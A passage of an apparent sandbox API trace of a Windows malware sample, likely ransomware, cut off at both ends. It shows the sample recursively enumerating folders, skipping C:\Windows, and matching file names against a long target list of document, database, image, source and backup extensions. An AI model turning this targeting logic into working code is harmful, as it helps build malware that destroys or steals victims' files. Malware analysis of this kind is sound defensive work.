lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".htc") returned 4 [0032.954] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".htm") returned 4 [0032.954] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".html") returned 5 [0032.954] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0032.954] lstrlenW (lpString=".icb") returned 4 [0032.954] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".ics") returned 4 [0032.954] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".iff") returned 4 [0032.954] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0032.954] lstrlenW (lpString=".inc") returned 4 [0032.954] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0032.955] lstrlenW (lpString=".indd") returned 5 [0032.955] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0032.955] lstrlenW (lpString=".ini") returned 4 [0032.955] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0032.955] FindNextFileW (in: hFindFile=0x6e39f0, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0032.955] FindClose (in: hFindFile=0x6e39f0 | out: hFindFile=0x6e39f0) returned 1 [0032.955] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.955] FindNextFileW (in: hFindFile=0x6e29a8, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0032.955] FindClose (in: hFindFile=0x6e29a8 | out: hFindFile=0x6e29a8) returned 1 [0032.955] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37e0fa0 | out: hHeap=0x5f0000) returned 1 [0032.955] FindNextFileW (in: hFindFile=0x6e2968, lpFindFileData=0x3a5fd00 | out: lpFindFileData=0x3a5fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0032.955] lstrlenW (lpString="C:\\Boot") returned 7 [0032.955] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0032.955] lstrlenW (lpString="Boot") returned 4 [0032.955] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0032.955] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37e0fa0 [0032.955] lstrlenW (lpString="C:\\Boot") returned 7 [0032.955] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e39b0 [0032.955] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.956] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0032.956] lstrlenW (lpString="BCD") returned 3 [0032.956] lstrlenW (lpString=".1cd") returned 4 [0032.956] lstrcmpiW (lpString1=".1cd", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".3ds") returned 4 [0032.956] lstrcmpiW (lpString1=".3ds", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".3fr") returned 4 [0032.956] lstrcmpiW (lpString1=".3fr", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".3g2") returned 4 [0032.956] lstrcmpiW (lpString1=".3g2", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".3gp") returned 4 [0032.956] lstrcmpiW (lpString1=".3gp", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".7z") returned 3 [0032.956] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0032.956] lstrlenW (lpString=".accda") returned 6 [0032.956] lstrcmpiW (lpString1=".accda", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".accdb") returned 6 [0032.956] lstrcmpiW (lpString1=".accdb", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".accdc") returned 6 [0032.956] lstrcmpiW (lpString1=".accdc", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".accde") returned 6 [0032.956] lstrcmpiW (lpString1=".accde", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".accdt") returned 6 [0032.956] lstrcmpiW (lpString1=".accdt", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".accdw") returned 6 [0032.956] lstrcmpiW (lpString1=".accdw", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".adb") returned 4 [0032.956] lstrcmpiW (lpString1=".adb", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".adp") returned 4 [0032.956] lstrcmpiW (lpString1=".adp", lpString2="") returned 1 [0032.956] lstrlenW (lpString=".ai") returned 3 [0032.956] lstrcmpiW (lpString1=".ai", lpString2="BCD") returned -1 [0032.956] lstrlenW (lpString=".ai3") returned 4 [0032.956] lstrcmpiW (lpString1=".ai3", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".ai4") returned 4 [0032.957] lstrcmpiW (lpString1=".ai4", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".ai5") returned 4 [0032.957] lstrcmpiW (lpString1=".ai5", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".ai6") returned 4 [0032.957] lstrcmpiW (lpString1=".ai6", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".ai7") returned 4 [0032.957] lstrcmpiW (lpString1=".ai7", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".ai8") returned 4 [0032.957] lstrcmpiW (lpString1=".ai8", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".anim") returned 5 [0032.957] lstrcmpiW (lpString1=".anim", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".arw") returned 4 [0032.957] lstrcmpiW (lpString1=".arw", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".as") returned 3 [0032.957] lstrcmpiW (lpString1=".as", lpString2="BCD") returned -1 [0032.957] lstrlenW (lpString=".asa") returned 4 [0032.957] lstrcmpiW (lpString1=".asa", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".asc") returned 4 [0032.957] lstrcmpiW (lpString1=".asc", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".ascx") returned 5 [0032.957] lstrcmpiW (lpString1=".ascx", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".asm") returned 4 [0032.957] lstrcmpiW (lpString1=".asm", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".asmx") returned 5 [0032.957] lstrcmpiW (lpString1=".asmx", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".asp") returned 4 [0032.957] lstrcmpiW (lpString1=".asp", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".aspx") returned 5 [0032.957] lstrcmpiW (lpString1=".aspx", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".asr") returned 4 [0032.957] lstrcmpiW (lpString1=".asr", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".asx") returned 4 [0032.957] lstrcmpiW (lpString1=".asx", lpString2="") returned 1 [0032.957] lstrlenW (lpString=".avi") returned 4 [0032.958] lstrcmpiW (lpString1=".avi", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".avs") returned 4 [0032.958] lstrcmpiW (lpString1=".avs", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".backup") returned 7 [0032.958] lstrcmpiW (lpString1=".backup", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".bak") returned 4 [0032.958] lstrcmpiW (lpString1=".bak", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".bay") returned 4 [0032.958] lstrcmpiW (lpString1=".bay", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".bd") returned 3 [0032.958] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1 [0032.958] lstrlenW (lpString=".bin") returned 4 [0032.958] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".bmp") returned 4 [0032.958] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".bz2") returned 4 [0032.958] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".c") returned 2 [0032.958] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1 [0032.958] lstrlenW (lpString=".cdr") returned 4 [0032.958] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".cer") returned 4 [0032.958] lstrcmpiW (lpString1=".cer", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".cf") returned 3 [0032.958] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1 [0032.958] lstrlenW (lpString=".cfc") returned 4 [0032.958] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".cfm") returned 4 [0032.958] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".cfml") returned 5 [0032.958] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".cfu") returned 4 [0032.958] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1 [0032.958] lstrlenW (lpString=".chm") returned 4 [0032.958] lstrcmpiW (lpString1=".chm", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".cin") returned 4 [0032.959] lstrcmpiW (lpString1=".cin", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".class") returned 6 [0032.959] lstrcmpiW (lpString1=".class", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".clx") returned 4 [0032.959] lstrcmpiW (lpString1=".clx", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".config") returned 7 [0032.959] lstrcmpiW (lpString1=".config", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".cpp") returned 4 [0032.959] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".cr2") returned 4 [0032.959] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".crt") returned 4 [0032.959] lstrcmpiW (lpString1=".crt", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".crw") returned 4 [0032.959] lstrcmpiW (lpString1=".crw", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".cs") returned 3 [0032.959] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1 [0032.959] lstrlenW (lpString=".css") returned 4 [0032.959] lstrcmpiW (lpString1=".css", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".csv") returned 4 [0032.959] lstrcmpiW (lpString1=".csv", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".cub") returned 4 [0032.959] lstrcmpiW (lpString1=".cub", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".dae") returned 4 [0032.959] lstrcmpiW (lpString1=".dae", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".dat") returned 4 [0032.959] lstrcmpiW (lpString1=".dat", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".db") returned 3 [0032.959] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1 [0032.959] lstrlenW (lpString=".dbf") returned 4 [0032.959] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".dbx") returned 4 [0032.959] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1 [0032.959] lstrlenW (lpString=".dc3") returned 4 [0032.960] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dcm") returned 4 [0032.960] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dcr") returned 4 [0032.960] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".der") returned 4 [0032.960] lstrcmpiW (lpString1=".der", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dib") returned 4 [0032.960] lstrcmpiW (lpString1=".dib", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dic") returned 4 [0032.960] lstrcmpiW (lpString1=".dic", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dif") returned 4 [0032.960] lstrcmpiW (lpString1=".dif", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".divx") returned 5 [0032.960] lstrcmpiW (lpString1=".divx", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".djvu") returned 5 [0032.960] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dng") returned 4 [0032.960] lstrcmpiW (lpString1=".dng", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".doc") returned 4 [0032.960] lstrcmpiW (lpString1=".doc", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".docm") returned 5 [0032.960] lstrcmpiW (lpString1=".docm", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".docx") returned 5 [0032.960] lstrcmpiW (lpString1=".docx", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dot") returned 4 [0032.960] lstrcmpiW (lpString1=".dot", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dotm") returned 5 [0032.960] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dotx") returned 5 [0032.960] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dpx") returned 4 [0032.960] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1 [0032.960] lstrlenW (lpString=".dqy") returned 4 [0032.960] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1 [0032.961] lstrlenW (lpString=".dsn") returned 4 [0032.961] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1 [0032.961] lstrlenW (lpString=".dt") returned 3 [0032.961] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1 [0032.961] lstrlenW (lpString=".dtd") returned 4 [0032.961] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1 [0032.961] lstrlenW (lpString=".dwg") returned 4 [0032.961] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1 [0032.961] lstrlenW (lpString=".dwt") returned 4 [0032.961] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1 [0032.961] lstrlenW (lpString=".dx") returned 3 [0032.961] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1 [0032.961] lstrlenW (lpString=".dxf") returned 4 [0032.961] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1 [0032.961] lstrlenW (lpString=".edml") returned 5 [0032.961] lstrcmpiW (lpString1=".edml", lpString2="") returned 1 [0032.961] lstrlenW (lpString=".efd") returned 4 [0032.961] lstrcmpiW (lpString1=".efd", lpString2="") returned 1 [0032.961] lstrlenW (lpString=".elf") returned 4 [0032.961] lstrcmpiW (lpString1=".elf", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".emf") returned 4 [0032.962] lstrcmpiW (lpString1=".emf", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".emz") returned 4 [0032.962] lstrcmpiW (lpString1=".emz", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".epf") returned 4 [0032.962] lstrcmpiW (lpString1=".epf", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".eps") returned 4 [0032.962] lstrcmpiW (lpString1=".eps", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".epsf") returned 5 [0032.962] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".epsp") returned 5 [0032.962] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".erf") returned 4 [0032.962] lstrcmpiW (lpString1=".erf", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".exr") returned 4 [0032.962] lstrcmpiW (lpString1=".exr", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".f4v") returned 4 [0032.962] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".fido") returned 5 [0032.962] lstrcmpiW (lpString1=".fido", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".flm") returned 4 [0032.962] lstrcmpiW (lpString1=".flm", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".flv") returned 4 [0032.962] lstrcmpiW (lpString1=".flv", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".frm") returned 4 [0032.962] lstrcmpiW (lpString1=".frm", lpString2="") returned 1 [0032.962] lstrlenW (lpString=".fxg") returned 4 [0032.962] lstrcmpiW (lpString1=".fxg", lpString2="") returned 1 [0032.962] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.962] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e49f8 [0032.963] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.963] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.963] FindClose (in: hFindFile=0x6e49f8 | out: hFindFile=0x6e49f8) returned 1 [0032.963] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.963] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0032.963] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.963] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e49f8 [0032.963] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.963] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.963] FindClose (in: hFindFile=0x6e49f8 | out: hFindFile=0x6e49f8) returned 1 [0032.963] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.963] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0032.964] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.964] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e49f8 [0032.964] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.964] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.964] FindClose (in: hFindFile=0x6e49f8 | out: hFindFile=0x6e49f8) returned 1 [0032.964] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x37f0fa8 | out: hHeap=0x5f0000) returned 1 [0032.964] FindNextFileW (in: hFindFile=0x6e39b0, lpFindFileData=0x3a5fa84 | out: lpFindFileData=0x3a5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0032.964] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x37f0fa8 [0032.964] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e49f8 [0032.964] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.964] FindNextFileW (in: hFindFile=0x6e49f8, lpFindFileData=0x3a5f808 | out: lpFindFileData=0x3a5f808*(dwFileAttributes=0x20, 